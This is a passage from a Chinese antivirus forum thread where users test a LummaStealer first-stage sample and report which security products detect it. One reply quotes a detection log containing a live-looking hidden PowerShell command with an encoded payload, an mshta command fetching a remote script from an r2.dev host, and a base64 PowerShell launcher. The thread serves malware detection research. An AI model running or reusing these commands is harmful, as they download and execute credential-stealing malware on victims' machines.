12
返回列表 发新帖
楼主: hsks
收起左侧

[病毒样本] 几天前的样本,某lummastealer的第一阶段

[复制链接]
biue
发表于 2024-8-25 09:30:32 | 显示全部楼层
腾讯电脑管家 1X

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
莒县小哥
发表于 2024-8-25 09:47:35 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
123456aaaafsdeg
发表于 2024-8-25 09:55:08 | 显示全部楼层
QVM360 发表于 2024-8-25 01:49
卡巴扫描文件miss
(楼上编辑不了,论坛bug)

切换到纯文本编辑

评分

参与人数 1人气 +1 收起 理由
QVM360 + 1 版区有你更精彩: )

查看全部评分

Nocria
发表于 2024-8-25 10:00:51 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Loyisa
发表于 2024-8-25 10:03:46 | 显示全部楼层
Avira kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
UNknownOoo
发表于 2024-8-25 10:16:16 | 显示全部楼层
火绒
  1. 防护项目:隐藏执行PowerShell
  2. 执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  3. 执行命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function uyifsx($bXtI){return -split ($bXtI -replace '..', '0x[        DISCUZ_CODE_0        ] ')};$ydPntDMI = uyifsx('B1F6BFBE67C6CDB2422627E7CB5D50A7DAFF007EDD57E22DEDA52944FA47B2AC1B83A54A9E30AFCAC1F469187238F4CC75C6C94AFDB668CC8AF7A7419A5599C001D9B1D0BC5CEB408F38E7D35234911249D39ADC357AE9A4C9D1D0296650A4BC97695A81281ADB49C210FDCEEEB2829B018084B11DCA5DE014B877ECE665FF4A669FB32C8CFD76B7BCBEB134EF0BD8831150FEF0ED75DE2CEE2AAF1C14763423B8B4941DAA75D8AF8FB1415D5A2FACA4D1ECBDF19BB4B68B040F2FA5AB52776C7BBB0AE1B92EE2FD552FC89655024D9DD4823C207B69F52A271CBC2B1C47216AD95658612BCA73D3C453AAA77EDCDF6E08817BA413079CBA5FE6417A57F3B96BB970265AD3F1EA5C6EF474427186711962E54895E2CD226B6DEECA842D54C23EF9570269638BDE15F8034F72220BFB6D7FFD045D58F556537F947B064C94EC31B27C96AFD4BD55131CBECF0BB1661D6302393FF60787A1F1AB05DC3AFC439450D84FC30B5F6E6A29CC3869610AC3A3F1A61D30590B07AE43E621B0876836B0AB90868028FD9AA1ADB37EEB669E55EAC7C0F38CF997B5497B7D14E71BACD5406449DF11F41B64D75
  4. 操作结果:已允许
  5. 进程ID:5748
  6. 操作进程:C:\Windows\System32\mshta.exe
  7. 操作进程命令行:"C:\Windows\system32\mshta.exe" https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/23lkjfhr
  8. 父进程ID:1972
  9. 父进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  10. 父进程命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAHAAdQBiAC0AOQBjADQAZQBjADcAZgAzAGYAOQA1AGMANAA0ADgAYgA4ADUAZQA0ADYANABkADIAYgA1ADMAMwBhAGEAYwAxAC4AcgAyAC4AZABlAHYALwAyADMAbABrAGoAZgBoAHIA
复制代码
  1. 病毒名称:ADV:Trojan/GenInjector.I
  2. 病毒路径:C:\Users\Administrator\AppData\Local\Temp\MarkdownMonster.exe
  3. 操作结果:已处理
复制代码
LTSC1809
发表于 2024-8-25 16:02:21 | 显示全部楼层
小a杀,铁壳杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
吃瓜群众第123位
发表于 2024-8-25 16:14:34 | 显示全部楼层
AhnLab V3 Internet Security 9.0 kill 云分析:恶意可疑行为:无(未分析)

反应迟钝了一些

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
1073328164
发表于 2024-8-26 10:04:23 | 显示全部楼层
迈克菲 kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
yaokai815
发表于 2024-8-29 14:29:24 | 显示全部楼层
瑞星 1x

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-9 22:53 , Processed in 0.088585 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表